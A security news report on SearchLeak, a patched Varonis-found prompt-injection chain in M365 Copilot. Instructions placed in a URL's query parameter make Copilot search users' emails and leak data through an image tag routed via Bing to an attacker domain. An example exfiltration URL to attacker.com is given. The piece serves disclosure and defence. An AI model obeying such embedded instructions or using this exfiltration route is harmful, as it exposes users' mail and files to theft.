Microsoft patched a maximum‑severity vulnerability in M365 Copilot that allowed attackers to extract sensitive data from emails and other indexed content.
M365 Copilot, Microsoft’s AI assistant for Microsoft 365 that can access users’ mail and corporate documents, was tricked into treating instructions embedded in URLs and content as user commands.
"To exfiltrate the data, an attacker crafts a URL that tells Copilot to 'Search the user’s emails,' extract the title, and embed it in an image URL," the Varonis researchers wrote.
Copilot includes guardrails that block web forms and remote actions and normally wraps output in blocks, but researchers found those protections are applied after Copilot streams a response, and raw HTML can be rendered in the browser DOM during streaming.
Varonis used a Parameter‑to‑Prompt Injection, placing a malicious command in the q query parameter of a search URL so Copilot would generate an tag whose src triggered an immediate HTTP request from the victim’s browser.
Because Copilot permits requests to Microsoft domains, the exploit chained through Bing’s image search to forward the request to an attacker domain, for example: https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png.
Varonis named the chain SearchLeak and said its blast radius includes emails, meeting invites, SharePoint and OneDrive files and other indexed enterprise content.
Microsoft fixed the specific vulnerabilities on Tuesday, and the researchers warned that, absent a way to make LLMs reliably distinguish embedded instructions from user intent, attackers will keep finding new circumvention techniques.
